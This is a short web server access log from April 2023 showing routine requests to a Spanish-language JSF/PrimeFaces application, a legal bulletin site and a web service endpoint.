181.53.13.61 - - [08/Apr/2023:13:36:51 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:51 -0500] "GET /sipse/js/jquery.min.js HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:51 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:52 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:52 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:52 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:52 -0500] "GET /sipse/css/imagen/contrasena.png HTTP/1.1" 404 383
181.53.13.61 - - [08/Apr/2023:13:36:52 -0500] "GET /sipse/imagenes/logoAplicacion.jpg HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:52 -0500] "GET /sipse/imagenes/cargando.gif HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:54 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:36:54 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 2658
181.53.13.61 - - [08/Apr/2023:13:36:55 -0500] "POST /sipse/faces/bienvenido.xhtml HTTP/1.1" 200 65484
181.53.13.61 - - [08/Apr/2023:13:37:01 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:37:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:37:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:37:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:37:01 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:37:01 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:37:01 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:37:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1556
181.53.13.61 - - [08/Apr/2023:13:37:06 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 17317
181.53.13.61 - - [08/Apr/2023:13:37:11 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 182880
181.53.13.61 - - [08/Apr/2023:13:37:14 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:37:14 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:37:14 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:37:14 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:37:14 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:37:14 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
181.53.13.61 - - [08/Apr/2023:13:37:14 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
113.142.141.105 - - [08/Apr/2023:13:37:48 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [08/Apr/2023:13:39:02 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
201.245.192.253 - - [08/Apr/2023:13:40:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 43150
201.245.192.253 - - [08/Apr/2023:13:40:04 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 42982
216.245.221.92 - - [08/Apr/2023:13:40:30 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:13:39:05 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.70.207 - - [08/Apr/2023:13:40:48 -0500] "-" 408 -
172.22.2.4 - - [08/Apr/2023:13:41:05 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/Analisis%20Sentencia%20T-1077,%202%20corregida.doc HTTP/1.1" 200 47616
201.245.192.253 - - [08/Apr/2023:13:41:25 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:13:39:55 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 52720
172.22.2.4 - - [08/Apr/2023:13:43:30 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9672
216.245.221.92 - - [08/Apr/2023:13:45:30 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [08/Apr/2023:13:46:26 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 42075
172.22.2.4 - - [08/Apr/2023:13:44:55 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [08/Apr/2023:13:45:45 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57551
